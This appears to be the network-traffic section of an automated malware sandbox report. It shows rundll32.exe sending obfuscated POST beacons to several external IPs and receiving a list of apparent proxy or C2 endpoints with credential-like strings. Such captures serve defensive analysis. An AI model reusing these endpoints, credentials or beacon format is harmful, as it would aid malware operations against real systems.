Aug 9, 2024 19:30:51.814228058 CEST	80	49748	77.238.224.56	192.168.2.4
Aug 9, 2024 19:30:51.815627098 CEST	49750	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:30:51.821880102 CEST	80	49750	77.238.229.63	192.168.2.4
Aug 9, 2024 19:30:51.822027922 CEST	49750	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:30:51.822561026 CEST	49750	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:30:51.827485085 CEST	80	49750	77.238.229.63	192.168.2.4
Aug 9, 2024 19:30:51.854264021 CEST	49748	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:51.869930983 CEST	49747	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:52.289711952 CEST	80	49749	77.238.229.63	192.168.2.4
Aug 9, 2024 19:30:52.291353941 CEST	49751	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:30:52.297117949 CEST	80	49751	77.238.250.123	192.168.2.4
Aug 9, 2024 19:30:52.297281027 CEST	49751	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:30:52.297672987 CEST	49751	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:30:52.303370953 CEST	80	49751	77.238.250.123	192.168.2.4
Aug 9, 2024 19:30:52.344990015 CEST	49749	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:30:52.422346115 CEST	80	49750	77.238.229.63	192.168.2.4
Aug 9, 2024 19:30:52.424257994 CEST	49752	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:30:52.429434061 CEST	80	49752	77.238.250.123	192.168.2.4
Aug 9, 2024 19:30:52.431082964 CEST	49752	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:30:52.432462931 CEST	49752	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:30:52.437336922 CEST	80	49752	77.238.250.123	192.168.2.4
Aug 9, 2024 19:30:52.464385986 CEST	49750	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:30:52.919675112 CEST	80	49751	77.238.250.123	192.168.2.4
Aug 9, 2024 19:30:52.921325922 CEST	49751	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:30:52.921358109 CEST	49749	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:30:52.921406984 CEST	49747	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:52.921442986 CEST	49745	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:52.921509027 CEST	49743	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:52.927097082 CEST	80	49751	77.238.250.123	192.168.2.4
Aug 9, 2024 19:30:52.928531885 CEST	80	49749	77.238.229.63	192.168.2.4
Aug 9, 2024 19:30:52.928546906 CEST	80	49747	77.238.224.56	192.168.2.4
Aug 9, 2024 19:30:52.928584099 CEST	80	49745	91.142.74.28	192.168.2.4
Aug 9, 2024 19:30:52.928597927 CEST	80	49743	195.2.70.38	192.168.2.4
Aug 9, 2024 19:30:52.928608894 CEST	49751	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:30:52.928631067 CEST	49749	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:30:52.928658962 CEST	49747	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:52.928668976 CEST	49745	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:52.928685904 CEST	49743	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:53.041307926 CEST	80	49752	77.238.250.123	192.168.2.4
Aug 9, 2024 19:30:53.041606903 CEST	49752	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:30:53.041783094 CEST	49746	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:53.041821957 CEST	49750	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:30:53.041837931 CEST	49748	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:53.041837931 CEST	49744	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:53.055573940 CEST	80	49752	77.238.250.123	192.168.2.4
Aug 9, 2024 19:30:53.055661917 CEST	49752	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:30:53.055671930 CEST	80	49746	91.142.74.28	192.168.2.4
Aug 9, 2024 19:30:53.055725098 CEST	80	49750	77.238.229.63	192.168.2.4
Aug 9, 2024 19:30:53.055773020 CEST	80	49748	77.238.224.56	192.168.2.4
Aug 9, 2024 19:30:53.055840969 CEST	80	49744	195.2.70.38	192.168.2.4
Aug 9, 2024 19:30:53.055866957 CEST	49746	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:30:53.055911064 CEST	49748	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:30:53.055954933 CEST	49744	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:30:53.055982113 CEST	49750	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:31:06.175043106 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:31:06.180545092 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:31:11.401339054 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:31:11.401767969 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:31:11.407228947 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:31:19.887047052 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:31:19.891976118 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:31:20.138149023 CEST	26395	49739	94.103.90.9	192.168.2.4
Aug 9, 2024 19:31:20.185807943 CEST	49739	26395	192.168.2.4	94.103.90.9
Aug 9, 2024 19:31:22.951154947 CEST	49753	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:31:22.959491968 CEST	80	49753	195.2.70.38	192.168.2.4
Aug 9, 2024 19:31:22.959647894 CEST	49753	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:31:22.960441113 CEST	49753	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:31:22.968409061 CEST	80	49753	195.2.70.38	192.168.2.4
Aug 9, 2024 19:31:23.040538073 CEST	49754	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:31:23.045526028 CEST	80	49754	195.2.70.38	192.168.2.4
Aug 9, 2024 19:31:23.045630932 CEST	49754	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:31:23.045965910 CEST	49754	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:31:23.050779104 CEST	80	49754	195.2.70.38	192.168.2.4
Aug 9, 2024 19:31:23.661927938 CEST	80	49753	195.2.70.38	192.168.2.4
Aug 9, 2024 19:31:23.663783073 CEST	49755	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:31:23.668715954 CEST	80	49755	91.142.74.28	192.168.2.4
Aug 9, 2024 19:31:23.670099974 CEST	49755	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:31:23.670452118 CEST	49755	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:31:23.676255941 CEST	80	49755	91.142.74.28	192.168.2.4
Aug 9, 2024 19:31:23.717669010 CEST	49753	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:31:23.778482914 CEST	80	49754	195.2.70.38	192.168.2.4
Aug 9, 2024 19:31:23.782784939 CEST	49756	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:31:23.788028002 CEST	80	49756	91.142.74.28	192.168.2.4
Aug 9, 2024 19:31:23.790132999 CEST	49756	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:31:23.790730953 CEST	49756	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:31:23.795743942 CEST	80	49756	91.142.74.28	192.168.2.4
Aug 9, 2024 19:31:23.822237015 CEST	49754	80	192.168.2.4	195.2.70.38
Aug 9, 2024 19:31:24.374453068 CEST	80	49755	91.142.74.28	192.168.2.4
Aug 9, 2024 19:31:24.377069950 CEST	49757	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:31:24.382200003 CEST	80	49757	77.238.224.56	192.168.2.4
Aug 9, 2024 19:31:24.382354021 CEST	49757	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:31:24.383058071 CEST	49757	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:31:24.388032913 CEST	80	49757	77.238.224.56	192.168.2.4
Aug 9, 2024 19:31:24.415043116 CEST	49755	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:31:24.499926090 CEST	80	49756	91.142.74.28	192.168.2.4
Aug 9, 2024 19:31:24.502337933 CEST	49758	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:31:24.507260084 CEST	80	49758	77.238.224.56	192.168.2.4
Aug 9, 2024 19:31:24.507436037 CEST	49758	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:31:24.508050919 CEST	49758	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:31:24.514098883 CEST	80	49758	77.238.224.56	192.168.2.4
Aug 9, 2024 19:31:24.555022955 CEST	49756	80	192.168.2.4	91.142.74.28
Aug 9, 2024 19:31:25.000452995 CEST	80	49757	77.238.224.56	192.168.2.4
Aug 9, 2024 19:31:25.024415016 CEST	49759	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:31:25.029705048 CEST	80	49759	77.238.229.63	192.168.2.4
Aug 9, 2024 19:31:25.029829025 CEST	49759	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:31:25.030198097 CEST	49759	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:31:25.036955118 CEST	80	49759	77.238.229.63	192.168.2.4
Aug 9, 2024 19:31:25.046369076 CEST	49757	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:31:25.115820885 CEST	80	49758	77.238.224.56	192.168.2.4
Aug 9, 2024 19:31:25.117402077 CEST	49760	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:31:25.122629881 CEST	80	49760	77.238.229.63	192.168.2.4
Aug 9, 2024 19:31:25.122745991 CEST	49760	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:31:25.123140097 CEST	49760	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:31:25.128163099 CEST	80	49760	77.238.229.63	192.168.2.4
Aug 9, 2024 19:31:25.170527935 CEST	49758	80	192.168.2.4	77.238.224.56
Aug 9, 2024 19:31:25.768892050 CEST	80	49760	77.238.229.63	192.168.2.4
Aug 9, 2024 19:31:25.811079025 CEST	49760	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:31:25.812309980 CEST	80	49759	77.238.229.63	192.168.2.4
Aug 9, 2024 19:31:25.857955933 CEST	49759	80	192.168.2.4	77.238.229.63
Aug 9, 2024 19:31:26.479943037 CEST	49761	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:31:26.493649006 CEST	49762	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:31:26.590218067 CEST	80	49761	77.238.250.123	192.168.2.4
Aug 9, 2024 19:31:26.590256929 CEST	80	49762	77.238.250.123	192.168.2.4
Aug 9, 2024 19:31:26.590370893 CEST	49761	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:31:26.591015100 CEST	49762	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:31:26.591015100 CEST	49761	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:31:26.591090918 CEST	49762	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:31:26.598666906 CEST	80	49761	77.238.250.123	192.168.2.4
Aug 9, 2024 19:31:26.598721981 CEST	80	49762	77.238.250.123	192.168.2.4
Aug 9, 2024 19:31:27.217256069 CEST	80	49762	77.238.250.123	192.168.2.4
Aug 9, 2024 19:31:27.218018055 CEST	80	49761	77.238.250.123	192.168.2.4
Aug 9, 2024 19:31:27.263191938 CEST	49762	80	192.168.2.4	77.238.250.123
Aug 9, 2024 19:31:27.263238907 CEST	49761	80	192.168.2.4	77.238.250.123

HTTP Request Dependency Graph

195.2.70.38

91.142.74.28

77.238.224.56

77.238.229.63

77.238.250.123

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	195.2.70.38	80	7132	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:28:46.922494888 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 4bxNKbGL Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:28:47.557013988 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:28:47 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests
Aug 9, 2024 19:28:47.770724058 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:28:47 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49737	91.142.74.28	80	7132	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:28:47.706377029 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: mIeSOwbQ Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:28:48.350313902 CEST	544	IN	HTTP/1.1 200 OK Date: Fri, 09 Aug 2024 17:28:48 GMT Content-Length: 426 Content-Type: text/plain; charset=utf-8 Data Raw: 39 34 2e 31 30 33 2e 39 30 2e 39 3b 32 36 33 39 35 3b 68 6b 4f 36 74 30 6a 36 74 66 69 76 70 6d 53 47 3a 69 35 4f 2f 4f 72 35 2f 33 46 30 31 51 41 4c 39 31 51 45 35 5a 78 70 2e 31 6d 75 32 58 6d 37 2e 72 57 53 37 38 48 64 30 71 33 75 2e 41 6d 69 33 33 47 47 38 51 39 39 2c 37 6a 39 68 41 41 45 74 6e 70 5a 74 31 6b 6d 70 73 42 47 3a 73 42 76 2f 48 33 6d 2f 59 4f 6a 39 4c 70 67 31 45 77 6b 2e 4e 4e 6a 31 79 78 67 34 68 38 7a 32 6f 4b 66 2e 65 33 4d 37 6f 54 6e 34 55 58 63 2e 33 36 39 32 58 53 53 38 7a 37 73 2c 33 6f 4d 68 51 76 31 74 52 63 33 74 67 73 62 70 4d 66 65 3a 35 37 79 2f 4a 4b 45 2f 69 38 59 37 47 6c 39 37 49 4c 74 2e 42 61 55 32 4e 56 55 33 43 6d 54 38 6a 72 58 2e 64 53 59 32 38 73 6c 32 70 31 59 34 56 45 57 2e 5a 34 6e 35 4c 35 61 36 68 4c 47 2c 54 49 71 68 32 69 36 74 79 79 41 74 54 4a 4c 70 6d 35 4d 3a 75 39 4e 2f 44 49 36 2f 74 53 53 37 47 66 58 37 6a 38 77 2e 58 37 35 32 34 57 64 33 6b 5a 34 38 45 52 58 2e 58 73 67 32 77 53 6b 32 38 78 37 39 6d 77 34 2e 72 78 78 36 74 46 35 33 4e 33 36 [TRUNCATED] Data Ascii: 94.103.90.9;26395;hkO6t0j6tfivpmSG:i5O/Or5/3F01QAL91QE5Zxp.1mu2Xm7.rWS78Hd0q3u.Ami33GG8Q99,7j9hAAEtnpZt1kmpsBG:sBv/H3m/YOj9Lpg1Ewk.NNj1yxg4h8z2oKf.e3M7oTn4UXc.3692XSS8z7s,3oMhQv1tRc3tgsbpMfe:57y/JKE/i8Y7Gl97ILt.BaU2NVU3CmT8jrX.dSY28sl2p1Y4VEW.Z4n5L5a6hLG,TIqh2i6tyyAtTJLpm5M:u9N/DI6/tSS7GfX7j8w.X7524Wd3kZ48ERX.Xsg2wSk28x79mw4.rxx6tF53N36,fDzhjist0JDtjPKpt1U:ZPz/9fl/PMu7ZLI7N4a.WUv2PAK3lUa89jI.bZJ2dZu5ujp0S8e.Wxk1oNG2TWy3R7P
Aug 9, 2024 19:29:18.494987965 CEST	6	OUT	Data Raw: 00 Data Ascii:
Aug 9, 2024 19:29:48.694083929 CEST	6	OUT	Data Raw: 00 Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49743	195.2.70.38	80	7100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:30:49.683842897 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 9p7rm0wE Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:30:50.384175062 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:30:50 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49744	195.2.70.38	80	7020	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:30:49.774321079 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: AZxF0cl2 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:30:50.488085032 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:30:50 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49745	91.142.74.28	80	7100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:30:50.391410112 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: Ndivacfu Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:30:51.081151962 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:30:50 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49746	91.142.74.28	80	7020	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:30:50.495434999 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: YWqi881N Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:30:51.205766916 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:30:51 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49747	77.238.224.56	80	7100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:30:51.088288069 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: pSH0uf0r Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:30:51.686045885 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:30:51 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49748	77.238.224.56	80	7020	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:30:51.213885069 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: nHAjwczh Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:30:51.814228058 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:30:51 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49749	77.238.229.63	80	7100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
